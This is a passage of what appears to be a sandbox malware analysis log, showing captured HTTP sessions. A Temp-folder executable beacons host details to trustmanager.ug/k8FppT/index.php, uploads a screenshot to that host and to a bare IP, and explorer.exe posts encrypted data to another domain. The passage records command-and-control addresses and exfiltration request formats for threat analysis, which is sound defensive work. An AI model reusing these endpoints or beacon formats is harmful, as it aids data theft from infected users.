2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:59.303666115 CEST	15403	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49765	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.462608099 CEST	15404	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:59.489562988 CEST	15418	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:59.489593983 CEST	15419	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49713	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:01.105724096 CEST	1632	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: atvcampingtrips.com
Aug 23, 2021 02:08:01.105747938 CEST	1632	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 71 05 cb f7 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuqr?zXuUa>i#`KoC@N6K8RMGMsnJ`0Y
Aug 23, 2021 02:08:02.273335934 CEST	1639	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:01 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 55 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 58 b5 ad 1e bd cf b0 f9 6d 92 21 c7 ed 2e 15 11 83 89 9c 81 77 d1 38 1c 1f 9a 4c 8f 41 63 Data Ascii: #\(R9lXm!.w8LAc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49766	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.464916945 CEST	15404	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cb Host: trustmanager.ug Content-Length: 93529 Cache-Control: no-cache
Aug 23, 2021 02:08:59.464953899 CEST	15404	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 30 62 30 65 62 33 64 35 32 33 33 30 30 33 30 66 36 62 62 36 37 62 33 62 65 65 33 30 36 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------40b0eb3d52330030f6bb67b3bee306cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:08:59.465073109 CEST	15414	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:08:59.465245008 CEST	15417	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:08:59.490346909 CEST	15422	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:08:59.490376949 CEST	15424	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:08:59.490387917 CEST	15427	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:08:59.490561008 CEST	15430	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:08:59.491101027 CEST	15432	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:08:59.491136074 CEST	15435	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:08:59.491149902 CEST	15439	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:08:59.569210052 CEST	15502	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:59.569241047 CEST	15502	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.3	49767	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.633763075 CEST	15503	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cb Host: 185.215.113.206 Content-Length: 93529 Cache-Control: no-cache
Aug 23, 2021 02:08:59.633888006 CEST	15503	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 30 62 30 65 62 33 64 35 32 33 33 30 30 33 30 66 36 62 62 36 37 62 33 62 65 65 33 30 36 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------40b0eb3d52330030f6bb67b3bee306cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:08:59.634109974 CEST	15513	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:08:59.634203911 CEST	15516	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:08:59.690892935 CEST	15523	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
